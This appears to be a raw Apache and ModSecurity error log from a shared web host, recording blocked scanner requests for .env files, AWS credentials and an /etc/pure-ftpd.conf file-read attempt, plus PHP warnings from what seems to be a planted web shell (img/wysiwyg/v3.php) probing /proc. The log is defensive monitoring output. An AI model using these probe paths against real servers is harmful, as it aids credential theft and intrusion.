[Mon May 11 15:40:29.484205 2026] [security2:error] [pid 1319953:tid 1319955] [client 43.157.170.13:56470] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHcTeSQ-m-m0ukSShuGzQAAAUA"], referer: http://pole-de-mobilite-regional.com
[Mon May 11 15:40:29.686319 2026] [:error] [pid 1319886:tid 1319913] [client 135.232.201.48:58335] File does not exist: /home/piregwan/public_html/xmlrpc.php
[Mon May 11 15:40:55.242723 2026] [proxy_http:error] [pid 1319885:tid 1319892] (20014)Internal error (specific information not available): [client 5.255.121.146:7776] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 15:40:55.242870 2026] [proxy:error] [pid 1319885:tid 1319892] [client 5.255.121.146:7776] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/credentials.json
[Mon May 11 15:40:55.245422 2026] [proxy_http:error] [pid 1319886:tid 1319911] (20014)Internal error (specific information not available): [client 5.255.121.146:7736] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 15:40:55.245671 2026] [proxy:error] [pid 1319886:tid 1319911] [client 5.255.121.146:7736] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.aws/credentials
[Mon May 11 15:41:18.832135 2026] [authz_core:error] [pid 1319998:tid 1320020] [client 40.77.167.29:37064] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/error_log
[Mon May 11 15:41:34.118640 2026] [authz_core:error] [pid 1319953:tid 1319979] [client 147.135.213.218:48698] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/WP_CLI/Action/error_log
[Mon May 11 15:42:17.561647 2026] [ssl:error] [pid 1320398:tid 1320405] (EAI 2)Name or service not known: [client 64.62.156.202:41256] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:42:17.561938 2026] [ssl:error] [pid 1320398:tid 1320405] AH01941: stapling_renew_response: responder error
[Mon May 11 15:42:26.493503 2026] [security2:error] [pid 1319886:tid 1319901] [client 216.73.216.110:22469] ModSecurity: Warning. Matched phrase "etc/pure-ftpd.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/pure-ftpd.conf found within ARGS:filesrc: /etc/pure-ftpd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHcwqy-5-wpj6Sx56afbAAAAAI"]
[Mon May 11 15:42:26.494242 2026] [security2:error] [pid 1319886:tid 1319901] [client 216.73.216.110:22469] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHcwqy-5-wpj6Sx56afbAAAAAI"]
[Mon May 11 15:42:26.589913 2026] [security2:error] [pid 1319886:tid 1319901] [client 216.73.216.110:22469] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHcwqy-5-wpj6Sx56afbAAAAAI"]
PHP Warning:  filesize(): stat failed for /proc/51/task/51/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/51/task/51/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/51/task/51/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/51/task/51/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/51/task/51/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/51/task/51/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 15:42:35.854248 2026] [core:error] [pid 1319998:tid 1320008] [client 66.132.172.198:42012] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:42:35.854546 2026] [core:error] [pid 1319998:tid 1320008] [client 66.132.172.198:42012] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704677/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704677/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704677/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704677/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704677/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704677/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 15:42:51.559398 2026] [autoindex:error] [pid 1320674:tid 1320708] [client 54.39.104.60:63581] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 15:43:52.100840 2026] [authz_core:error] [pid 1320674:tid 1320704] [client 216.73.216.110:44948] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/coursecopy/classes/error_log
[Mon May 11 15:44:45.508799 2026] [security2:error] [pid 1319953:tid 1319966] [client 43.156.67.44:56270] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tchatbooster.com"] [uri "/"] [unique_id "agHdTeSQ-m-m0ukSShuIqgAAAUs"]
[Mon May 11 15:44:49.819263 2026] [ssl:error] [pid 1319885:tid 1319893] (EAI 2)Name or service not known: [client 74.7.175.189:41010] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:44:49.819492 2026] [ssl:error] [pid 1319885:tid 1319893] AH01941: stapling_renew_response: responder error
[Mon May 11 15:44:50.217393 2026] [security2:error] [pid 1320398:tid 1320404] [client 43.156.67.44:40112] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agHdUuJEyNRN152ArOSTGwAAAEQ"], referer: http://tchatbooster.com
[Mon May 11 15:46:28.650821 2026] [security2:error] [pid 1320398:tid 1320422] [client 34.186.240.114:52608] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.local"] [unique_id "agHdtOJEyNRN152ArOSTtwAAAFY"]
[Mon May 11 15:46:28.651179 2026] [security2:error] [pid 1320398:tid 1320422] [client 34.186.240.114:52608] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.local"] [unique_id "agHdtOJEyNRN152ArOSTtwAAAFY"]
[Mon May 11 15:46:28.687915 2026] [security2:error] [pid 1319998:tid 1320007] [client 34.186.240.114:52614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env"] [unique_id "agHdtKt2WtvoFr7xvGzbTgAAAIc"]
[Mon May 11 15:46:28.688084 2026] [security2:error] [pid 1319998:tid 1320007] [client 34.186.240.114:52614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env"] [unique_id "agHdtKt2WtvoFr7xvGzbTgAAAIc"]
[Mon May 11 15:46:28.705310 2026] [security2:error] [pid 1319885:tid 1319912] [client 34.186.240.114:52636] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/app/.env"] [unique_id "agHdtFchVQ3tCn0m9OpfYQAAAQ4"]
[Mon May 11 15:46:28.705499 2026] [security2:error] [pid 1319885:tid 1319912] [client 34.186.240.114:52636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/app/.env"] [unique_id "agHdtFchVQ3tCn0m9OpfYQAAAQ4"]
[Mon May 11 15:46:28.705543 2026] [security2:error] [pid 1320674:tid 1320699] [client 34.186.240.114:52626] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/admin/.env"] [unique_id "agHdtKO9RdIr1DwxYR2bEQAAAMk"]
[Mon May 11 15:46:28.705708 2026] [security2:error] [pid 1320674:tid 1320699] [client 34.186.240.114:52626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/admin/.env"] [unique_id "agHdtKO9RdIr1DwxYR2bEQAAAMk"]
[Mon May 11 15:46:28.713460 2026] [security2:error] [pid 1319886:tid 1319913] [client 34.186.240.114:52648] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/api/.env"] [unique_id "agHdtKy-5-wpj6Sx56ag7gAAAAk"]
[Mon May 11 15:46:28.713615 2026] [security2:error] [pid 1319886:tid 1319913] [client 34.186.240.114:52648] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/api/.env"] [unique_id "agHdtKy-5-wpj6Sx56ag7gAAAAk"]
[Mon May 11 15:46:28.719507 2026] [security2:error] [pid 1320398:tid 1320420] [client 34.186.240.114:52652] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.docker"] [unique_id "agHdtOJEyNRN152ArOSTuAAAAFQ"]
[Mon May 11 15:46:28.719654 2026] [security2:error] [pid 1320398:tid 1320420] [client 34.186.240.114:52652] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.docker"] [unique_id "agHdtOJEyNRN152ArOSTuAAAAFQ"]
[Mon May 11 15:46:28.727899 2026] [security2:error] [pid 1320674:tid 1320693] [client 34.186.240.114:52680] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/app/.env.local"] [unique_id "agHdtKO9RdIr1DwxYR2bEgAAAMM"]
[Mon May 11 15:46:28.728075 2026] [security2:error] [pid 1320674:tid 1320693] [client 34.186.240.114:52680] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/app/.env.local"] [unique_id "agHdtKO9RdIr1DwxYR2bEgAAAMM"]
[Mon May 11 15:46:28.728960 2026] [security2:error] [pid 1319998:tid 1320019] [client 34.186.240.114:52658] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.dev.local"] [unique_id "agHdtKt2WtvoFr7xvGzbTwAAAJM"]
[Mon May 11 15:46:28.729151 2026] [security2:error] [pid 1319998:tid 1320019] [client 34.186.240.114:52658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.dev.local"] [unique_id "agHdtKt2WtvoFr7xvGzbTwAAAJM"]
[Mon May 11 15:46:28.730332 2026] [security2:error] [pid 1319953:tid 1319958] [client 34.186.240.114:52664] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.development.local"] [unique_id "agHdtOSQ-m-m0ukSShuJggAAAUM"]
[Mon May 11 15:46:28.730496 2026] [security2:error] [pid 1319953:tid 1319958] [client 34.186.240.114:52664] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.development.local"] [unique_id "agHdtOSQ-m-m0ukSShuJggAAAUM"]
[Mon May 11 15:46:28.732313 2026] [security2:error] [pid 1319885:tid 1319938] [client 34.186.240.114:52682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.dev"] [unique_id "agHdtFchVQ3tCn0m9OpfYgAAARg"]
[Mon May 11 15:46:28.732498 2026] [security2:error] [pid 1319885:tid 1319938] [client 34.186.240.114:52682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.dev"] [unique_id "agHdtFchVQ3tCn0m9OpfYgAAARg"]
[Mon May 11 15:46:31.814972 2026] [security2:error] [pid 1319998:tid 1320007] [client 34.186.240.114:52614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHdtKt2WtvoFr7xvGzbTgAAAIc"]
[Mon May 11 15:46:31.814972 2026] [security2:error] [pid 1320674:tid 1320699] [client 34.186.240.114:52626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHdtKO9RdIr1DwxYR2bEQAAAMk"]
[Mon May 11 15:46:31.815124 2026] [security2:error] [pid 1319953:tid 1319958] [client 34.186.240.114:52664] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHdtOSQ-m-m0ukSShuJggAAAUM"]
[Mon May 11 15:46:31.815330 2026] [security2:error] [pid 1319998:tid 1320019] [client 34.186.240.114:52658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHdtKt2WtvoFr7xvGzbTwAAAJM"]
[Mon May 11 15:46:31.815652 2026] [security2:error] [pid 1319885:tid 1319938] [client 34.186.240.114:52682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHdtFchVQ3tCn0m9OpfYgAAARg"]
[Mon May 11 15:46:31.815865 2026] [security2:error] [pid 1319886:tid 1319913] [client 34.186.240.114:52648] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHdtKy-5-wpj6Sx56ag7gAAAAk"]
